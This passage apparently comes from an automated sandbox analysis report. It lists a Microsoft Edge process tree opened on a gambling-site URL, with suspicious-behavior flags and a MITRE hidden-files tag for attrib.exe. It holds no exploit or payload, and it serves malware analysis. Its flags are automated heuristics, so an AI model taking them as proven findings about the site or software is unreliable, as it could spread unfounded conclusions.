PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85
PID 3212 wrote to memory of 1332	3212	msedge.exe	85

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
15532	attrib.exe
17924	attrib.exe
8436	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://bloxflip.com/a/kriszti
1⤵
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3212
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffb150c46f8,0x7ffb150c4708,0x7ffb150c4718
  2⤵
  PID:3644
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2088 /prefetch:2
  2⤵
  PID:1800
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2408 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
  2⤵
  PID:1332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
  2⤵
  PID:3748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
  2⤵
  PID:1960
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  PID:2156
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5108 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1
  2⤵
  PID:3752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:808
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:1
  2⤵
  PID:528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5260 /prefetch:1
  2⤵
  PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2596 /prefetch:1
  2⤵
  PID:4088
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
  2⤵
  PID:1676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1284 /prefetch:1
  2⤵
  PID:3296
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:112
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6008 /prefetch:1
  2⤵
  PID:2176
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
  2⤵
  PID:972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:4108
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5268 /prefetch:8
  2⤵
  PID:4524
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
  2⤵
  PID:5104
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6968 /prefetch:1
  2⤵
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6396 /prefetch:1
  2⤵
  PID:4916
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6388 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2992
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6728 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7084 /prefetch:1
  2⤵
  PID:3872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
  2⤵
  PID:3476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5400 /prefetch:1
  2⤵
  PID:1672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:400
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:1
  2⤵
  PID:3092
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5844 /prefetch:1
  2⤵
  PID:2248
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6244 /prefetch:8
  2⤵
  PID:1484
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3012 /prefetch:1
  2⤵
  PID:1680
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3124 /prefetch:1
  2⤵
  PID:1244
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
  2⤵
  PID:1528
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5368 /prefetch:1
  2⤵
  PID:2932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:1
  2⤵
  PID:4616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1308 /prefetch:1
  2⤵
  PID:3468
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2100 /prefetch:1
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6816 /prefetch:1
  2⤵
  PID:2696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6340 /prefetch:1
  2⤵
  PID:2976
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6948 /prefetch:1
  2⤵
  PID:4456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7372 /prefetch:1
  2⤵
  PID:1496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
  2⤵
  PID:2904
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7212 /prefetch:1
  2⤵
  PID:4548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=7536 /prefetch:8
  2⤵
  PID:4180
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7480 /prefetch:1
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5300 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3820
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:2648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7324 /prefetch:1
  2⤵
  PID:4792
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7460 /prefetch:1
  2⤵
  PID:5064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7436 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7132 /prefetch:1
  2⤵
  PID:3548
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7540 /prefetch:1
  2⤵
  PID:4312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7860 /prefetch:8
  2⤵
  PID:4476
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
  2⤵
  PID:2012
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7484 /prefetch:1
  2⤵
  PID:3080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,16106101478215283467,8324615692606995337,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1
  2⤵
  PID:2152
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
